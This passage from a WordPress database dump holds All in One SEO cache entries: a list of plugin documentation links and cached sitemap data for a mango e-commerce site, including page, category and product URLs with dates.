SEO\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/how-to-disable-sitemaps-in-all-in-one-seo\\/\",\"categories\":[\"google-news-sitemap\",\"rss-sitemap\",\"video-sitemap\",\"xml-sitemap\"]},\"18873\":{\"title\":\"Baidu Webmaster Tools Verification\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/baidu-webmaster-tools-verification\\/\",\"categories\":[\"webmaster-tools\",\"webmaster-verification\"]},\"18874\":{\"title\":\"Setting Twitter Social Meta for Your Homepage\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/setting-twitter-social-meta-for-your-homepage\\/\",\"categories\":[\"home-page-settings\",\"social-networks\",\"twitter-settings\"]},\"18875\":{\"title\":\"Setting Facebook Social Meta for Your Homepage\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/setting-facebook-social-meta-for-your-homepage\\/\",\"categories\":[\"facebook-settings\",\"home-page-settings\",\"social-networks\"]},\"18876\":{\"title\":\"Setting the Card Type for Twitter\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/setting-the-card-type-for-twitter\\/\",\"categories\":[\"social-networks\",\"twitter-settings\"]},\"18877\":{\"title\":\"Setting the Object Types for Facebook\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/setting-the-object-types-for-facebook\\/\",\"categories\":[\"facebook-settings\",\"social-networks\"]},\"18879\":{\"title\":\"Setting the Priority and Frequency for Content in the Video Sitemap\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/setting-the-priority-and-frequency-for-content-in-the-video-sitemap\\/\",\"categories\":[\"video-sitemap\"]},\"18880\":{\"title\":\"Setting the Priority and Frequency for Content in the XML Sitemap\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/setting-the-priority-and-frequency-for-content-in-the-xml-sitemap\\/\",\"categories\":[\"xml-sitemap\"]},\"18881\":{\"title\":\"How to Exclude Content from Your RSS Sitemap\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/how-to-exclude-content-from-your-rss-sitemap\\/\",\"categories\":[\"rss-sitemap\"]},\"18882\":{\"title\":\"How to Exclude Content from Your Google News Sitemap\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/how-to-exclude-content-from-your-google-news-sitemap\\/\",\"categories\":[\"google-news-sitemap\"]},\"18883\":{\"title\":\"How to Exclude Content from Your Video Sitemap\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/how-to-exclude-content-from-your-video-sitemap\\/\",\"categories\":[\"video-sitemap\"]},\"18884\":{\"title\":\"How to Exclude Content from Your XML Sitemap\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/how-to-exclude-content-from-your-xml-sitemap\\/\",\"categories\":[\"xml-sitemap\"]},\"18885\":{\"title\":\"Setting Article Tags for Facebook\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/setting-article-tags-for-facebook\\/\",\"categories\":[\"facebook-settings\",\"social-networks\"]},\"18886\":{\"title\":\"Setting the Content Author for Twitter\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/setting-the-content-author-for-twitter\\/\",\"categories\":[\"social-networks\",\"twitter-settings\"]},\"18887\":{\"title\":\"Setting the Content Author for Facebook\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/setting-the-content-author-for-facebook\\/\",\"categories\":[\"facebook-settings\",\"social-networks\"]},\"18888\":{\"title\":\"Setting the Content Publisher for Facebook\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/setting-the-content-publisher-for-facebook\\/\",\"categories\":[\"facebook-settings\",\"social-networks\"]},\"18889\":{\"title\":\"How to Create a Google News Sitemap\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/how-to-create-a-google-news-sitemap\\/\",\"categories\":[\"google-news-sitemap\"]},\"18890\":{\"title\":\"Including Videos in Custom Fields in Your Video Sitemap\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/including-videos-in-custom-fields-in-your-video-sitemap\\/\",\"categories\":[\"video-sitemap\"]},\"18891\":{\"title\":\"What is a Dynamically Generated Sitemap and Why is it Better to Use?\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/what-is-a-dynamically-generated-sitemap-and-why-is-it-better-to-use\\/\",\"categories\":[\"frequently-asked-questions\",\"video-sitemap\",\"xml-sitemap\"]},\"18892\":{\"title\":\"How to Create a Video Sitemap\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/how-to-create-a-video-sitemap\\/\",\"categories\":[\"video-sitemap\"]},\"18893\":{\"title\":\"Adding Your Facebook Admin ID\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/adding-your-facebook-admin-id\\/\",\"categories\":[\"facebook-settings\",\"social-networks\"]},\"18894\":{\"title\":\"Adding Your Facebook App ID\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/adding-your-facebook-app-id\\/\",\"categories\":[\"facebook-settings\",\"social-networks\"]},\"18895\":{\"title\":\"Access Control Settings\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/access-control-settings\\/\",\"categories\":[\"access-control-settings\"]},\"18896\":{\"title\":\"Advanced Settings for Google Analytics\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/advanced-settings-for-google-analytics\\/\",\"categories\":[\"google-analytics\"]},\"18897\":{\"title\":\"Miscellaneous Site Verification\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/miscellaneous-site-verification\\/\",\"categories\":[\"webmaster-tools\",\"webmaster-verification\"]},\"18898\":{\"title\":\"Displaying Your Social Media Profiles in Knowledge Panel\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/displaying-your-social-media-profiles-in-knowledge-panel\\/\",\"categories\":[\"schema-settings\",\"social-networks\"]},\"18899\":{\"title\":\"How to Create an RSS Sitemap\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/how-to-create-an-rss-sitemap\\/\",\"categories\":[\"rss-sitemap\"]},\"18900\":{\"title\":\"Excluding Images from the XML Sitemap\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/excluding-images-from-the-xml-sitemap\\/\",\"categories\":[\"xml-sitemap\"]},\"18901\":{\"title\":\"Adding non-WordPress Content to the XML Sitemap\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/adding-non-wordpress-content-to-the-xml-sitemap\\/\",\"categories\":[\"xml-sitemap\"]},\"18903\":{\"title\":\"Setting a Default Image for Twitter\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/setting-a-default-image-for-twitter\\/\",\"categories\":[\"social-networks\",\"twitter-settings\"]},\"18904\":{\"title\":\"Setting a Default Image for Facebook\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/setting-a-default-image-for-facebook\\/\",\"categories\":[\"facebook-settings\",\"social-networks\"]},\"18905\":{\"title\":\"Setting a Title Separator\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/setting-a-title-separator\\/\",\"categories\":[\"search-appearance\"]},\"18906\":{\"title\":\"How to Protect Your Content With RSS Content Settings\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/how-to-protect-your-content-with-rss-content-settings\\/\",\"categories\":[\"rss-content-settings\"]},\"18907\":{\"title\":\"How to Connect Your Site with Google Tag Manager\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/how-to-connect-your-site-with-google-tag-manager\\/\",\"categories\":[\"google-analytics\"]},\"18908\":{\"title\":\"How to Connect Your Site with Google Analytics\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/how-to-connect-your-site-with-google-analytics\\/\",\"categories\":[\"google-analytics\"]},\"18909\":{\"title\":\"How to Verify Your Site with Pinterest\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/how-to-verify-your-site-with-pinterest\\/\",\"categories\":[\"pinterest-settings\",\"social-networks\",\"webmaster-tools\",\"webmaster-verification\"]},\"18910\":{\"title\":\"How to Verify Your Site with Yandex Webmaster Tools\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/how-to-verify-your-site-with-yandex-webmaster-tools\\/\",\"categories\":[\"webmaster-tools\",\"webmaster-verification\"]},\"18911\":{\"title\":\"How to Verify Your Site with Bing Webmaster Tools\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/how-to-verify-your-site-with-bing-webmaster-tools\\/\",\"categories\":[\"bing-webmaster-tools\",\"webmaster-tools\",\"webmaster-verification\"]},\"18912\":{\"title\":\"How to Verify Your Site with Google Search Console\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/how-to-verify-your-site-with-google-search-console\\/\",\"categories\":[\"google-search-console\",\"webmaster-tools\",\"webmaster-verification\"]},\"18913\":{\"title\":\"Usage Tracking\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/usage-tracking\\/\",\"categories\":[\"frequently-asked-questions\"]},\"18915\":{\"title\":\"How do I use All in One SEO in my language?\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/how-do-i-use-all-in-one-seo-in-my-language\\/\",\"categories\":[\"frequently-asked-questions\"]},\"18920\":{\"title\":\"NGINX rewrite rules for Robots.txt\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/nginx-rewrite-rules-for-robots-txt\\/\",\"categories\":[\"robots-txt\"]},\"18927\":{\"title\":\"Supported PHP Versions for All in One SEO\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/supported-php-version\\/\",\"categories\":[\"troubleshooting\"]},\"18929\":{\"title\":\"Using a different CDN for script enqueuing\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/using-a-different-cdn-for-script-enqueuing\\/\",\"categories\":[\"troubleshooting\"]},\"18930\":{\"title\":\"How do I get Google to show sitelinks for my site?\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/how-do-i-get-google-to-show-sitelinks-for-my-site\\/\",\"categories\":[\"frequently-asked-questions\"]},\"18954\":{\"title\":\"How does the import process for SEO data work?\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/how-does-the-import-process-for-seo-data-work\\/\",\"categories\":[\"frequently-asked-questions\",\"importer-exporter\"]},\"18960\":{\"title\":\"Robots.txt Editor for Multisite Networks\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/robots-txt-editor-for-multisite-networks\\/\",\"categories\":[\"robots-txt\"]},\"18961\":{\"title\":\"What are the minimum requirements for All in One SEO?\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/what-are-the-minimum-requirements-for-all-in-one-seo-pack\\/\",\"categories\":[\"frequently-asked-questions\"]},\"18964\":{\"title\":\"How do I use your API code examples?\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/how-do-i-use-your-api-code-examples\\/\",\"categories\":[\"frequently-asked-questions\"]},\"18969\":{\"title\":\"XML Parsing Error - This page contains the following errors\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/this-page-contains-the-following-errors\\/\",\"categories\":[\"google-news-sitemap\",\"troubleshooting\",\"video-sitemap\",\"xml-sitemap\"]},\"18972\":{\"title\":\"The File Editor or Robots.txt modules are missing\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/the-file-editor-or-robots-txt-modules-are-missing\\/\",\"categories\":[\"frequently-asked-questions\"]},\"18977\":{\"title\":\"Excluding the XML Sitemap from caching\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/excluding-the-xml-sitemap-from-caching\\/\",\"categories\":[\"xml-sitemap\"]},\"18982\":{\"title\":\"Why doesn\'t the title and description I set appear in search results?\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/why-doesnt-the-title-and-description-i-set-appear-in-search-results\\/\",\"categories\":[\"frequently-asked-questions\",\"post-page-settings\"]},\"18983\":{\"title\":\"Can I remove the date from Google search results?\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/can-i-remove-the-date-from-google-search-results\\/\",\"categories\":[\"frequently-asked-questions\"]},\"18985\":{\"title\":\"Setting up HTTPS SSL\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/setting-up-https-ssl\\/\",\"categories\":[\"general-seo-topics\"]},\"18995\":{\"title\":\"How to Increase the WordPress PHP Memory Limit\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/increase-wordpress-php-memory-limit\\/\",\"categories\":[\"troubleshooting\"]},\"19002\":{\"title\":\"Checking Index Status in Google Search Results\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/checking-index-status-in-google-search-results\\/\",\"categories\":[\"general-seo-topics\"]},\"19006\":{\"title\":\"SEO Data Importer\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/seo-data-importer\\/\",\"categories\":[\"seo-data-importer\"]},\"19008\":{\"title\":\"How to troubleshoot issues with All in One SEO\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/how-to-troubleshoot-issues-with-all-in-one-seo-pack\\/\",\"categories\":[\"troubleshooting\"]},\"19010\":{\"title\":\"Quality Guidelines for SEO Titles and Descriptions\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/quality-guidelines-for-seo-titles-and-descriptions\\/\",\"categories\":[\"general-seo-topics\"]},\"19016\":{\"title\":\"Top Tips for Good On-Page SEO\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/top-tips-for-good-on-page-seo\\/\",\"categories\":[\"general-seo-topics\"]},\"19017\":{\"title\":\"Meta Descriptions\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/meta-descriptions\\/\",\"categories\":[\"general-seo-topics\"]},\"19028\":{\"title\":\"What is SEO meta?\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/what-is-seo-meta\\/\",\"categories\":[\"getting-started\"]},\"19029\":{\"title\":\"Social Meta Settings - Individual Page\\/Post Settings\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/social-meta-settings-individual-pagepost-settings\\/\",\"categories\":[\"post-page-settings\",\"social-networks\"]},\"19030\":{\"title\":\"File Editor Module\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/file-editor-module\\/\",\"categories\":[\"file-editor\"]},\"19031\":{\"title\":\"Social Meta Settings\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/social-meta-module\\/\",\"categories\":[\"social-networks\"]},\"19032\":{\"title\":\"Importer & Exporter Module\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/importer-exporter-module\\/\",\"categories\":[\"importer-exporter\"]},\"19034\":{\"title\":\"Feature Manager\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/feature-manager\\/\",\"categories\":[\"feature-manager\"]},\"19035\":{\"title\":\"Advanced Settings for All in One SEO Pack\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/all-in-one-seo-pack-advanced-settings\\/\",\"categories\":[\"advanced-settings\"]}}}\";','2022-03-18 10:47:17','2022-02-02 04:36:00','2022-03-11 10:47:17'),(1154,'aioseo_sitemap_sitemap.xml','a:3:{s:6:\"counts\";a:9:{s:38:\"https://mangomitra.in/post-sitemap.xml\";i:6;s:38:\"https://mangomitra.in/page-sitemap.xml\";i:20;s:48:\"https://mangomitra.in/e-landing-page-sitemap.xml\";i:1;s:51:\"https://mangomitra.in/elementor_library-sitemap.xml\";i:1;s:41:\"https://mangomitra.in/product-sitemap.xml\";i:49;s:41:\"https://mangomitra.in/contest-sitemap.xml\";i:2;s:52:\"https://mangomitra.in/contest_submission-sitemap.xml\";i:2;s:42:\"https://mangomitra.in/category-sitemap.xml\";i:3;s:45:\"https://mangomitra.in/product_cat-sitemap.xml\";i:6;}s:8:\"datetime\";a:9:{s:38:\"https://mangomitra.in/post-sitemap.xml\";a:2:{s:4:\"date\";s:16:\"February 4, 2022\";s:4:\"time\";s:7:\"4:01 pm\";}s:38:\"https://mangomitra.in/page-sitemap.xml\";a:2:{s:4:\"date\";s:17:\"February 17, 2022\";s:4:\"time\";s:7:\"4:26 pm\";}s:48:\"https://mangomitra.in/e-landing-page-sitemap.xml\";a:2:{s:4:\"date\";s:16:\"January 31, 2022\";s:4:\"time\";s:7:\"5:42 pm\";}s:51:\"https://mangomitra.in/elementor_library-sitemap.xml\";a:2:{s:4:\"date\";s:16:\"February 3, 2022\";s:4:\"time\";s:8:\"10:29 am\";}s:41:\"https://mangomitra.in/product-sitemap.xml\";a:2:{s:4:\"date\";s:13:\"March 4, 2022\";s:4:\"time\";s:7:\"1:18 pm\";}s:41:\"https://mangomitra.in/contest-sitemap.xml\";a:2:{s:4:\"date\";s:17:\"February 25, 2022\";s:4:\"time\";s:7:\"4:16 pm\";}s:52:\"https://mangomitra.in/contest_submission-sitemap.xml\";a:2:{s:4:\"date\";s:17:\"February 25, 2022\";s:4:\"time\";s:7:\"9:35 am\";}s:42:\"https://mangomitra.in/category-sitemap.xml\";a:2:{s:4:\"date\";s:16:\"February 4, 2022\";s:4:\"time\";s:7:\"4:01 pm\";}s:45:\"https://mangomitra.in/product_cat-sitemap.xml\";a:2:{s:4:\"date\";s:13:\"March 4, 2022\";s:4:\"time\";s:7:\"1:19 pm\";}}s:10:\"pagination\";a:2:{s:7:\"showing\";i:9;s:5:\"total\";i:9;}}','2022-04-05 19:33:28','2022-02-02 10:37:44','2022-03-06 19:33:28'),(1877,'admin_notifications_update','i:1647404202;','2022-03-16 04:16:42','2022-02-06 07:50:59','2022-03-15 04:16:42'),(3840,'d99ed2ddbeefba28910cca4100f73b401b38bc49','s:4:\"none\";','2022-03-15 10:27:59','2022-02-12 07:22:43','2022-03-14 10:27:59'),(3843,'aioseo_sitemap_elementor_library-sitemap.xml','a:3:{s:6:\"counts\";a:0:{}s:8:\"datetime\";a:1:{s:52:\"https://mangomitra.in/?elementor_library=default-kit\";a:2:{s:4:\"date\";s:16:\"February 3, 2022\";s:4:\"time\";s:8:\"10:29 am\";}}s:10:\"pagination\";a:2:{s:7:\"showing\";i:1;s:5:\"total\";i:1;}}','2022-04-03 21:35:14','2022-02-12 15:53:37','2022-03-04 21:35:14'),(3844,'aioseo_sitemap_page-sitemap.xml','a:3:{s:6:\"counts\";a:0:{}s:8:\"datetime\";a:20:{s:32:\"https://mangomitra.in/dashboard/\";a:2:{s:4:\"date\";s:16:\"January 24, 2022\";s:4:\"time\";s:7:\"1:13 pm\";}s:27:\"https://mangomitra.in/shop/\";a:2:{s:4:\"date\";s:16:\"January 24, 2022\";s:4:\"time\";s:7:\"1:13 pm\";}s:22:\"https://mangomitra.in/\";a:2:{s:4:\"date\";s:13:\"March 7, 2022\";s:4:\"time\";s:7:\"4:49 pm\";}s:31:\"https://mangomitra.in/wishlist/\";a:2:{s:4:\"date\";s:16:\"January 24, 2022\";s:4:\"time\";s:7:\"2:37 pm\";}s:44:\"https://mangomitra.in/vendor-registration-2/\";a:2:{s:4:\"date\";s:16:\"January 24, 2022\";s:4:\"time\";s:7:\"2:52 pm\";}s:31:\"https://mangomitra.in/about-us/\";a:2:{s:4:\"date\";s:16:\"January 24, 2022\";s:4:\"time\";s:7:\"4:06 pm\";}s:37:\"https://mangomitra.in/pricing-policy/\";a:2:{s:4:\"date\";s:16:\"January 24, 2022\";s:4:\"time\";s:7:\"4:06 pm\";}s:43:\"https://mangomitra.in/terms-and-conditions/\";a:2:{s:4:\"date\";s:16:\"January 24, 2022\";s:4:\"time\";s:7:\"4:07 pm\";}s:39:\"https://mangomitra.in/privacy-policy-2/\";a:2:{s:4:\"date\";s:16:\"January 24, 2022\";s:4:\"time\";s:7:\"4:08 pm\";}s:43:\"https://mangomitra.in/refunds-cancellation/\";a:2:{s:4:\"date\";s:16:\"January 24, 2022\";s:4:\"time\";s:7:\"4:09 pm\";}s:36:\"https://mangomitra.in/store-manager/\";a:2:{s:4:\"date\";s:17:\"February 17, 2022\";s:4:\"time\";s:7:\"4:23 pm\";}s:40:\"https://mangomitra.in/vendor-membership/\";a:2:{s:4:\"date\";s:17:\"February 17, 2022\";s:4:\"time\";s:7:\"4:26 pm\";}s:38:\"https://mangomitra.in/vendor-register/\";a:2:{s:4:\"date\";s:17:\"February 17, 2022\";s:4:\"time\";s:7:\"4:26 pm\";}s:31:\"https://mangomitra.in/calender/\";a:2:{s:4:\"date\";s:16:\"February 4, 2022\";s:4:\"time\";s:7:\"5:40 pm\";}s:34:\"https://mangomitra.in/upload-form/\";a:2:{s:4:\"date\";s:16:\"February 4, 2022\";s:4:\"time\";s:8:\"12:52 pm\";}s:33:\"https://mangomitra.in/user-login/\";a:2:{s:4:\"date\";s:16:\"February 4, 2022\";s:4:\"time\";s:8:\"12:55 pm\";}s:36:\"https://mangomitra.in/mango-recipes/\";a:2:{s:4:\"date\";s:16:\"February 9, 2022\";s:4:\"time\";s:7:\"3:23 pm\";}s:32:\"https://mangomitra.in/contest-3/\";a:2:{s:4:\"date\";s:16:\"February 9, 2022\";s:4:\"time\";s:7:\"3:27 pm\";}s:31:\"https://mangomitra.in/activity/\";a:2:{s:4:\"date\";s:17:\"February 15, 2022\";s:4:\"time\";s:8:\"10:52 am\";}s:30:\"https://mangomitra.in/members/\";a:2:{s:4:\"date\";s:17:\"February 15, 2022\";s:4:\"time\";s:8:\"10:52 am\";}}s:10:\"pagination\";a:2:{s:7:\"showing\";i:20;s:5:\"total\";i:20;}}','2022-04-06 19:47:01','2022-02-12 15:54:00','2022-03-07 19:47:01'),(3845,'aioseo_sitemap_pwb-brand-sitemap.xml','a:3:{s:6:\"counts\";a:0:{}s:8:\"datetime\";a:2:{s:33:\"https://mangomitra.in/brand/beta/\";a:2:{s:4:\"date\";s:16:\"February 8, 2022\";s:4:\"time\";s:7:\"4:55 pm\";}s:34:\"https://mangomitra.in/brand/gamma/\";a:2:{s:4:\"date\";s:16:\"January 31, 2022\";s:4:\"time\";s:7:\"4:50 pm\";}}s:10:\"pagination\";a:2:{s:7:\"showing\";i:2;s:5:\"total\";i:2;}}','2022-03-14 15:54:13','2022-02-12 15:54:13','2022-02-12 15:54:13'),(3846,'aioseo_sitemap_product_cat-sitemap.xml','a:3:{s:6:\"counts\";a:0:{}s:8:\"datetime\";a:6:{s:47:\"https://mangomitra.in/product-category/mangoes/\";a:2:{s:4:\"date\";s:13:\"March 7, 2022\";s:4:\"time\";s:7:\"4:56 pm\";}s:47:\"https://mangomitra.in/product-category/pickles/\";a:2:{s:4:\"date\";s:13:\"March 7, 2022\";s:4:\"time\";s:8:\"10:08 am\";}s:54:\"https://mangomitra.in/product-category/pickle-mangoes/\";a:2:{s:4:\"date\";s:13:\"March 4, 2022\";s:4:\"time\";s:7:\"1:19 pm\";}s:57:\"https://mangomitra.in/product-category/jams-and-squashes/\";a:2:{s:4:\"date\";s:13:\"March 4, 2022\";s:4:\"time\";s:8:\"11:17 am\";}s:52:\"https://mangomitra.in/product-category/mango-juices/\";a:2:{s:4:\"date\";s:13:\"March 4, 2022\";s:4:\"time\";s:8:\"12:22 pm\";}s:55:\"https://mangomitra.in/product-category/deal-of-the-day/\";a:2:{s:4:\"date\";s:13:\"March 4, 2022\";s:4:\"time\";s:8:\"12:19 pm\";}}s:10:\"pagination\";a:2:{s:7:\"showing\";i:6;s:5:\"total\";i:6;}}','2022-04-06 19:46:58','2022-02-12 15:57:21','2022-03-07 19:46:58'),(3847,'aioseo_sitemap_product-sitemap.xml','a:3:{s:6:\"counts\";a:0:{}s:8:\"datetime\";a:50:{s:43:\"https://mangomitra.in/product/appemidi-5kg/\";a:2:{s:4:\"date\";s:13:\"March 4, 2022\";s:4:\"time\";s:8:\"11:00 am\";}s:41:\"https://mangomitra.in/product/avakai-5kg/\";a:2:{s:4:\"date\";s:13:\"March 4, 2022\";s:4:\"time\";s:8:\"12:39 pm\";}s:42:\"https://mangomitra.in/product/dasheri-3kg/\";a:2:{s:4:\"date\";s:13:\"March 4, 2022\";s:4:\"time\";s:8:\"11:00 am\";}s:51:\"https://mangomitra.in/product/devagad-alphonso-3kg/\";a:2:{s:4:\"date\";s:13:\"March 4, 2022\";s:4:\"time\";s:8:\"11:00 am\";}s:51:\"https://mangomitra.in/product/devagad-alphonso-5kg/\";a:2:{s:4:\"date\";s:13:\"March 4, 2022\";s:4:\"time\";s:8:\"11:00 am\";}s:53:\"https://mangomitra.in/product/ratnagiri-alphonso-3kg/\";a:2:{s:4:\"date\";s:13:\"March 4, 2022\";s:4:\"time\";s:8:\"11:00 am\";}s:53:\"https://mangomitra.in/product/ratnagiri-alphonso-5kg/\";a:2:{s:4:\"date\";s:13:\"March 4, 2022\";s:4:\"time\";s:8:\"11:00 am\";}s:40:\"https://mangomitra.in/product/kesar-3kg/\";a:2:{s:4:\"date\";s:13:\"March 4, 2022\";s:4:\"time\";s:8:\"10:59 am\";}s:40:\"https://mangomitra.in/product/kesar-5kg/\";a:2:{s:4:\"date\";s:13:\"March 4, 2022\";s:4:\"time\";s:8:\"10:59 am\";}s:45:\"https://mangomitra.in/product/maagaya-pickle/\";a:2:{s:4:\"date\";s:13:\"March 4, 2022\";s:4:\"time\";s:8:\"10:59 am\";}s:46:\"https://mangomitra.in/product/omlet-mango-5kg/\";a:2:{s:4:\"date\";s:13:\"March 7, 2022\";s:4:\"time\";s:8:\"10:08 am\";}s:48:\"https://mangomitra.in/product/ramkela-mango-5kg/\";a:2:{s:4:\"date\";s:13:\"March 4, 2022\";s:4:\"time\";s:8:\"10:59 am\";}s:49:\"https://mangomitra.in/product/rajapuri-mango-5kg/\";a:2:{s:4:\"date\";s:13:\"March 4, 2022\";s:4:\"time\";s:8:\"10:59 am\";}s:44:\"https://mangomitra.in/product/raw-mango-5kg/\";a:2:{s:4:\"date\";s:13:\"March 4, 2022\";s:4:\"time\";s:8:\"10:59 am\";}s:49:\"https://mangomitra.in/product/totapuri-mango-5kg/\";a:2:{s:4:\"date\";s:13:\"March 4, 2022\";s:4:\"time\";s:8:\"10:58 am\";}s:65:\"https://mangomitra.in/product/kissan-mango-jam-glass-bottle-188g/\";a:2:{s:4:\"date\";s:13:\"March 4, 2022\";s:4:\"time\";s:8:\"11:10 am\";}s:70:\"https://mangomitra.in/product/frooti-mango-drink-plastic-bottle-600ml/\";a:2:{s:4:\"date\";s:13:\"March 4, 2022\";s:4:\"time\";s:8:\"11:09 am\";}s:67:\"https://mangomitra.in/product/frooti-mango-drink-plastic-bottle-2l/\";a:2:{s:4:\"date\";s:13:\"March 4, 2022\";s:4:\"time\";s:8:\"12:22 pm\";}s:61:\"https://mangomitra.in/product/paper-boat-aamras-tetrapack-1l/\";a:2:{s:4:\"date\";s:13:\"March 4, 2022\";s:4:\"time\";s:8:\"12:22 pm\";}s:53:\"https://mangomitra.in/product/banginapalli-mango-3kg/\";a:2:{s:4:\"date\";s:13:\"March 4, 2022\";s:4:\"time\";s:8:\"12:22 pm\";}s:53:\"https://mangomitra.in/product/banginapalli-mango-5kg/\";a:2:{s:4:\"date\";s:13:\"March 4, 2022\";s:4:\"time\";s:8:\"12:22 pm\";}s:73:\"https://mangomitra.in/product/tropicana-slice-fruit-drink-tetrapack-1-2l/\";a:2:{s:4:\"date\";s:13:\"March 4, 2022\";s:4:\"time\";s:8:\"12:22 pm\";}s:49:\"https://mangomitra.in/product/totapuri-mango-3kg/\";a:2:{s:4:\"date\";s:13:\"March 4, 2022\";s:4:\"time\";s:8:\"12:54 pm\";}s:51:\"https://mangomitra.in/product/totapuri-mango-5kg-2/\";a:2:{s:4:\"date\";s:13:\"March 4, 2022\";s:4:\"time\";s:8:\"12:55 pm\";}s:47:\"https://mangomitra.in/product/neelam-mango-3kg/\";a:2:{s:4:\"date\";s:13:\"March 4, 2022\";s:4:\"time\";s:8:\"12:22 pm\";}s:47:\"https://mangomitra.in/product/neelam-mango-5kg/\";a:2:{s:4:\"date\";s:13:\"March 4, 2022\";s:4:\"time\";s:8:\"12:22 pm\";}s:46:\"https://mangomitra.in/product/hapus-mango-3kg/\";a:2:{s:4:\"date\";s:13:\"March 4, 2022\";s:4:\"time\";s:8:\"12:22 pm\";}s:46:\"https://mangomitra.in/product/hapus-mango-5kg/\";a:2:{s:4:\"date\";s:13:\"March 4, 2022\";s:4:\"time\";s:8:\"12:22 pm\";}s:48:\"https://mangomitra.in/product/sendura-mango-3kg/\";a:2:{s:4:\"date\";s:13:\"March 4, 2022\";s:4:\"time\";s:8:\"12:21 pm\";}s:48:\"https://mangomitra.in/product/sendura-mango-5kg/\";a:2:{s:4:\"date\";s:13:\"March 4, 2022\";s:4:\"time\";s:8:\"12:21 pm\";}s:48:\"https://mangomitra.in/product/raspuri-mango-3kg/\";a:2:{s:4:\"date\";s:13:\"March 4, 2022\";s:4:\"time\";s:8:\"12:52 pm\";}s:48:\"https://mangomitra.in/product/raspuri-mango-5kg/\";a:2:{s:4:\"date\";s:13:\"March 4, 2022\";s:4:\"time\";s:8:\"12:34 pm\";}s:50:\"https://mangomitra.in/product/himasagar-mango-3kg/\";a:2:{s:4:\"date\";s:13:\"March 4, 2022\";s:4:\"time\";s:8:\"12:49 pm\";}s:50:\"https://mangomitra.in/product/himasagar-mango-5kg/\";a:2:{s:4:\"date\";s:13:\"March 4, 2022\";s:4:\"time\";s:8:\"12:50 pm\";}s:48:\"https://mangomitra.in/product/malgova-mango-3kg/\";a:2:{s:4:\"date\";s:13:\"March 4, 2022\";s:4:\"time\";s:8:\"12:19 pm\";}s:48:\"https://mangomitra.in/product/malgova-mango-5kg/\";a:2:{s:4:\"date\";s:13:\"March 4, 2022\";s:4:\"time\";s:8:\"12:19 pm\";}s:47:\"https://mangomitra.in/product/langra-mango-3kg/\";a:2:{s:4:\"date\";s:13:\"March 7, 2022\";s:4:\"time\";s:8:\"10:10 am\";}s:47:\"https://mangomitra.in/product/langra-mango-5kg/\";a:2:{s:4:\"date\";s:13:\"March 7, 2022\";s:4:\"time\";s:8:\"10:10 am\";}s:52:\"https://mangomitra.in/product/imam-pasand-mango-3kg/\";a:2:{s:4:\"date\";s:13:\"March 4, 2022\";s:4:\"time\";s:8:\"12:18 pm\";}s:52:\"https://mangomitra.in/product/imam-pasand-mango-5kg/\";a:2:{s:4:\"date\";s:13:\"March 